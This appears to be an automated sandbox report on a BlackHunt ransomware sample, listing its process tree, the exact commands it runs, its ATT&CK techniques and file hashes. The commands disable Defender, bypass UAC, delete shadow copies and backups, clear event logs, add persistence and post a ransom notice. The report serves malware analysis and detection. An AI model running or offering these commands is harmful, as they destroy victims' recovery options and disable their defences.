PID 2156 wrote to memory of 2556 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 147 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe"C:\Users\Admin\AppData\Local\Temp\ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2156 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2604
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2716
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:868
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2304
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1956
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2080
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1416
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2892
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1512
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1244
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:704
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1888
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2112
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe" /F2⤵PID:2568
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1128
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1736
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2184
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1716
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:548
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2984
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1988
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:948
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:820
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1704
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2764
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2600
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2128
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2020
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2004
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:204
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:220
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2664
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3060
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1896
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:484
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1320
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1820
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1324
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe"2⤵
- Deletes itself
PID:1636 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2648
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2436
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:564
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2984
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:1400
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2744
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:2080
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2296
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:800
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe" /F1⤵
- Creates scheduled task(s)
PID:2452
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:2520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2544
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:2384
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1668 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1952
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:1464
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:2508
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:2436
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1580
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2356
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2480
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:3012
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2636
-
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2924
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:2308
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:2256
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1092
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:1320
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:700
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1984
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2340
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1784314683508815577-1021467085-1346937235-10668285631627353981-168467110-786834969"1⤵PID:1668
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1654254029-1152519405-599538062-1380529561-20324607741212671706-10531690191947780232"1⤵PID:2520
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:2804
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:996
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2932
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1588169996-1526568404-1811220001-519577323180042476-85832725658924670357568734"1⤵PID:1488
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "577197290-1838314719-25221745-14859217951124633060225411028459644075-708407147"1⤵PID:2924
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1774716994-9238396541045579218-13047557681284812127-2075992053-8731547871342151956"1⤵PID:1952
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "11018805372141936547-9810116881085015868-70001580374184751521153595101371339849"1⤵PID:2544
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50c0680eb2f24d3ad90c99e0998faca44
SHA16ae2b0f06f846ca3a248d371ec2b02ca09243776
SHA2568cba3d937dbdbca71787c3bbfc35a3d9de8c373a3c64cf4e202691604b972bef
SHA512f91128e2d2402300d5675e488a0c2664a3fc2a3e92391b7086463c65c3ea1cad47d3f2ba99edf724b8aae7835067738bb818147994dd947788d6ef41640be6c6
-
Filesize
12KB
MD5cdedb7652f294555a5b3a3c265ac54b5
SHA14d72b5b77424d42e124cc242b7354a1159eb79b2
SHA25694845d08bcc8d5cfb5ebf1e5b5a075f4a05394f09cb645b31b41fd603aac6e96
SHA5128ba6bfa744f860b7fdfc5beff52ae10e1e030c69aabda45fdbd2a2fd2cdb95bfe8f20885e2bdb6c93617500e4c3890f3f1010e061add78d9dc443c031a66849e
-
Filesize
684B
MD59e910b51f02e606e2870a10697b09bf4
SHA178c77a738544d4a2775e47acf7c457bd4c62935b
SHA256f15fb3c2fb82d1d6cda630f8b9ca8dd953595388e0fa5607f3e664f901e58ae2
SHA512c04731384d41672bca2c4ca24d4271cb9157a5c6e34425b5dc838a4288328632a212c64f350d7cdc26a9b398e71216efb27955b367ce8062e7357ae19c67b8ae